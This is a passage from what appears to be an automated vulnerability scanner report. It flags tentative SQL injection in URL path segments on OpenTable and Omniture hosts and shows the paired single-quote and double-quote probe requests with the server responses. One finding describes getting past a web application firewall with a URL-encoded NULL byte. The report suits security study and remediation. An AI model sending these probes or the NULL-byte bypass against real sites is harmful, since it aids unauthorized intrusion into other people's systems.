Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; jslt=DhNUH7QEwV3Jv9lH5b7HaYn50h4yr3sP; s_sq=%5B%5BB%5D%5D; restrefwhite=200; ftc=x=10%2f03%2f2011+15%3a55%3a22&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153"&p1=117&rr1=200&rr2=200; pgseq="; s_cc=true; s_nr=1317646624233-New

Response 2

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 13:05:35 GMT
Server: Omniture DC/2.0.0
xserver: www598
Content-Length: 0
Content-Type: text/html

1.4. http://o.opentable.com/b/ss/otrestref/1/H.22.1/s45203784920740 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://o.opentable.com
Path:   /b/ss/otrestref/1/H.22.1/s45203784920740

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b/ss/otrestref%00'/1/H.22.1/s45203784920740?AQB=1&pccr=true&vidn=2744D82905163E7C-40000198C000C552&&ndh=1&t=3%2F9%2F2011%207%3A53%3A59%201%20300&ce=UTF-8&pageName=reservationwidgetsinglesearchboxpage&g=http%3A%2F%2Fwww.grandcafe-sf.com%2F&r=http%3A%2F%2Fwww.kimptonhotels.com%2Frestaurants%2Frestaurant-reservations.aspx&cc=USD&ch=San%20Francisco%20Bay%20Area&events=event55&c1=San%20Francisco%20Bay%20Area%3Areservationwidget&v1=San%20Francisco%20Bay%20Area%3Areservationwidget&c2=San%20Francisco%20Bay%20Area%3Areservationwidget&v2=San%20Francisco%20Bay%20Area%3Areservationwidget&v5=ReservationWidget&c7=Logged%20Out&c9=reservationwidgetsinglesearchboxpage&c12=New&v12=New&c13=reservationwidgetsinglesearchboxpage&c17=4%3A30AM&v17=4%3A30AM&c18=Monday&v18=Monday&c19=Weekday&v19=Weekday&c32=Grand%20Cafe&v33=90&v36=anonymous&c38=reservationwidgetsinglesearchboxpage&v38=90&v39=San%20Francisco%20Bay%20Area&v43=reservationwidgetsinglesearchboxpage&v45=FrontdoorSearchBoxRestRef&v50=reservationwidgetsinglesearchboxpage&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1074&bh=906&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava(TM)%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BRemoting%20Viewer%3BNative%20Client%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: o.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.grandcafe-sf.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pgseq=; ftc=x=10%2f03%2f2011+15%3a53%3a35&p1=220&p1q=rid%3d90%26restref%3d90%26bgcolor%3de3d4a4%26titlecolor%3d000000%26subtitlecolor%3d000000%26btnbgimage%3dhttp%253a%252f%252fwww.opentable.com%252ffrontdoor%252fimg%252fot_btn_black.png%26otlink%3dFFFFFF%26icon%3ddark%26mode%3dshort&c=0; lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]

Response 1

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 12:59:26 GMT
Server: Omniture DC/2.0.0
Content-Length: 407
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss/otrestref was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss/otrestref%00''/1/H.22.1/s45203784920740?AQB=1&pccr=true&vidn=2744D82905163E7C-40000198C000C552&&ndh=1&t=3%2F9%2F2011%207%3A53%3A59%201%20300&ce=UTF-8&pageName=reservationwidgetsinglesearchboxpage&g=http%3A%2F%2Fwww.grandcafe-sf.com%2F&r=http%3A%2F%2Fwww.kimptonhotels.com%2Frestaurants%2Frestaurant-reservations.aspx&cc=USD&ch=San%20Francisco%20Bay%20Area&events=event55&c1=San%20Francisco%20Bay%20Area%3Areservationwidget&v1=San%20Francisco%20Bay%20Area%3Areservationwidget&c2=San%20Francisco%20Bay%20Area%3Areservationwidget&v2=San%20Francisco%20Bay%20Area%3Areservationwidget&v5=ReservationWidget&c7=Logged%20Out&c9=reservationwidgetsinglesearchboxpage&c12=New&v12=New&c13=reservationwidgetsinglesearchboxpage&c17=4%3A30AM&v17=4%3A30AM&c18=Monday&v18=Monday&c19=Weekday&v19=Weekday&c32=Grand%20Cafe&v33=90&v36=anonymous&c38=reservationwidgetsinglesearchboxpage&v38=90&v39=San%20Francisco%20Bay%20Area&v43=reservationwidgetsinglesearchboxpage&v45=FrontdoorSearchBoxRestRef&v50=reservationwidgetsinglesearchboxpage&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1074&bh=906&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava(TM)%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BRemoting%20Viewer%3BNative%20Client%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: o.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.grandcafe-sf.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pgseq=; ftc=x=10%2f03%2f2011+15%3a53%3a35&p1=220&p1q=rid%3d90%26restref%3d90%26bgcolor%3de3d4a4%26titlecolor%3d000000%26subtitlecolor%3d000000%26btnbgimage%3dhttp%253a%252f%252fwww.opentable.com%252ffrontdoor%252fimg%252fot_btn_black.png%26otlink%3dFFFFFF%26icon%3ddark%26mode%3dshort&c=0; lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]

Response 2

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 12:59:26 GMT
Server: Omniture DC/2.0.0
xserver: www612
Content-Length: 0
Content-Type: text/html

1.5. http://www.opentable.com/irp/jquery/js/ScriptHandler.ashx [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.opentable.com
Path:   /irp/jquery/js/ScriptHandler.ashx

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /irp/jquery/js/ScriptHandler.ashx'?f=jquery&z=true HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.opentable.com/jaspers-corner-tap-and-kitchen?rid=200&restref=200
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; restrefwhite=200; ftc=x=10%2f03%2f2011+15%3a54%3a50&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153&p1=117&rr1=200&rr2=200; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; jslt=DhNUH7QEwV3Jv9lH5b7HaYn50h4yr3sP; pgseq=

Response 1 (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 12:56:34 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-02
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:22-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:56:34 GMT; path=/
Set-Cookie: restrefwhite=200; domain=.opentable.com; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a56%3a34&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153"&p1=117&rr1=200&rr2=200; domain=.opentable.com; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:56:34 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:56:34 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:56:34 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:56:34 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:56:34 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:56:34 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:56:34 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:56:34 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:56:34 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:56:34 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:56:34 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:56:34 GMT; path=/
Vary: Accept-Encoding
Content-Length: 5548


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head id="Head1"><BASE HREF="http://www.opentable.com/"><meta http-
...[SNIP]...
<form name="Form1" method="post" action="500.aspx?aspxerrorpath=%2f404.aspx" id="Form1">
...[SNIP]...
<span id="lblMsgSubTitle">We're sorry, but we encountered a failure during the last operation. Please try again.</span>
...[SNIP]...
e="Powered By OpenTable: Restaurant Reservations. Right this way." class="footerPoweredByLogo" Text="Powered By OpenTable: Restaurant Reservations. Right this way." src="/img/buttons/poweredbyOpenTableStacked.png" style="border-width:0px;" />
...[SNIP]...

Request 2

GET /irp/jquery/js/ScriptHandler.ashx''?f=jquery&z=true HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.opentable.com/jaspers-corner-tap-and-kitchen?rid=200&restref=200
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; restrefwhite=200; ftc=x=10%2f03%2f2011+15%3a54%3a50&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153&p1=117&rr1=200&rr2=200; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; jslt=DhNUH7QEwV3Jv9lH5b7HaYn50h4yr3sP; pgseq=

Response 2

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 12:56:34 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
Etag:
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:56:34 GMT; path=/
Set-Cookie: restrefwhite=200; domain=.opentable.com; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a56%3a34&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153"&p1=117&rr1=200&rr2=200; domain=.opentable.com; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:56:34 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:56:34 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:56:34 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:56:34 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:56:34 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:56:34 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:56:34 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:56:34 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:56:34 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:56:34 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:56:34 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:56:34 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 3028


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head id="Head1"><BASE HREF="http://www.opentable.com/"><meta http-
...[SNIP]...
1.6. http://www.opentable.com/jaspers-corner-tap-and-kitchen [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.opentable.com
Path:   /jaspers-corner-tap-and-kitchen

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /jaspers-corner-tap-and-kitchen'?rid=200&restref=200 HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.kimptonhotels.com/restaurants/restaurant-reservations.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D; restrefwhite=90; ftc=x=10%2f03%2f2011+15%3a54%3a50&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; pgseq=

Response 1 (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 12:55:22 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:22 GMT; path=/
Set-Cookie: restrefwhite=200; domain=.opentable.com; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a55%3a22&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153"&p1=117&rr1=200&rr2=200; domain=.opentable.com; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:22 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:22 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:22 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:22 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:22 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:22 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:22 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:22 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:22 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:22 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:22 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:22 GMT; path=/
Vary: Accept-Encoding
Content-Length: 5548


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head id="Head1"><BASE HREF="http://www.opentable.com/"><meta http-
...[SNIP]...
<form name="Form1" method="post" action="500.aspx?aspxerrorpath=%2f404.aspx" id="Form1">
...[SNIP]...
<span id="lblMsgSubTitle">We're sorry, but we encountered a failure during the last operation. Please try again.</span>
...[SNIP]...
e="Powered By OpenTable: Restaurant Reservations. Right this way." class="footerPoweredByLogo" Text="Powered By OpenTable: Restaurant Reservations. Right this way." src="/img/buttons/poweredbyOpenTableStacked.png" style="border-width:0px;" />
...[SNIP]...

Request 2

GET /jaspers-corner-tap-and-kitchen''?rid=200&restref=200 HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.kimptonhotels.com/restaurants/restaurant-reservations.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D; restrefwhite=90; ftc=x=10%2f03%2f2011+15%3a54%3a50&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; pgseq=

Response 2

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 12:55:22 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
Etag:
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:22 GMT; path=/
Set-Cookie: restrefwhite=200; domain=.opentable.com; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a55%3a22&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153"&p1=117&rr1=200&rr2=200; domain=.opentable.com; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:22 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:22 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:22 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:22 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:22 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:22 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:22 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:22 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:22 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:22 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:22 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:22 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 5574


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head id="Head1"><BASE HREF="http://www.opentable.com/"><meta http-
...[SNIP]...
1.7. http://www.opentable.com/jscripts/ScriptHandler.ashx [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.opentable.com
Path:   /jscripts/ScriptHandler.ashx

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /jscripts/ScriptHandler.ashx'?f=jquery&z=true HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.grandcafe-sf.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pgseq=; ftc=x=10%2f03%2f2011+15%3a53%3a35&p1=220&p1q=rid%3d90%26restref%3d90%26bgcolor%3de3d4a4%26titlecolor%3d000000%26subtitlecolor%3d000000%26btnbgimage%3dhttp%253a%252f%252fwww.opentable.com%252ffrontdoor%252fimg%252fot_btn_black.png%26otlink%3dFFFFFF%26icon%3ddark%26mode%3dshort&c=0; lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]

Response 1 (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 12:54:31 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-03
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:22-0800" exp "2009.12.01T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:31 GMT; path=/
Set-Cookie: restrefwhite=90; domain=.opentable.com; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a54%3a31&p1=220&p1q=rid%3d90%26restref%3d90%26bgcolor%3de3d4a4%26titlecolor%3d000000%26subtitlecolor%3d000000%26btnbgimage%3dhttp%253a%252f%252fwww.opentable.com%252ffrontdoor%252fimg%252fot_btn_black.png%26otlink%3dFFFFFF%26icon%3ddark%26mode%3dshort&c=1&rr1=90&rr2=90&er=0&hr=http://www.grandcafe-sf.com/&tp=125; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:31 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:31 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:31 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:31 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:31 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:31 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:31 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:31 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:31 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:31 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:31 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:31 GMT; path=/
Vary: Accept-Encoding
Content-Length: 5548


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head id="Head1"><BASE HREF="http://www.opentable.com/"><meta http-
...[SNIP]...
<form name="Form1" method="post" action="500.aspx?aspxerrorpath=%2f404.aspx" id="Form1">
...[SNIP]...
